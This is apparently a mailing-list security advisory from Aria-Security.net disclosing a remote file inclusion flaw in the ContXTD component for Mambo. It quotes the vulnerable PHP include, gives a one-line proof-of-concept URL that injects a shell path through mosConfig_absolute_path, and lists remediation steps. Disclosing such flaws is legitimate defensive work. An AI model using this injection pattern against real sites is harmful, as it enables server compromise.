<<< Date Index >>>     <<< Thread Index >>>

Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln



                
###########################################################################################
                #                       Aria-Security.net Advisory              
                          #
                #                       Discovered  by: O.U.T.L.A.W             
                          #     

                #                       < www.Aria-security.net >               
                          #
                #               Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp    
                          #
                #                                                               
                          #
                
###########################################################################################


#Software: Mambo Components ContXTD
#Attack method: Remote File Inclusion
#Source:

** ensure this file is being included by a parent file */
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not 
allowed.' );

include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' );
        
 

************************************************************************************

                                                                                
          
#Proof of Concept:                                                              
          
#
#www.site.com/contxtd/contxtd.class.php?mosConfig_absolute_path=SHELL
#
#                                                                               
                                

#                                                         
#Solutions : 
#1 - If you have access on webserver turn register_globals in php.ini off
#2 - You must give a value before put the value of variable in the include 
function or check and filter #unnormal entrance out . 
#
#                                                                               
                  
#Contact : Outlaw@xxxxxxxxxxxxxxxxx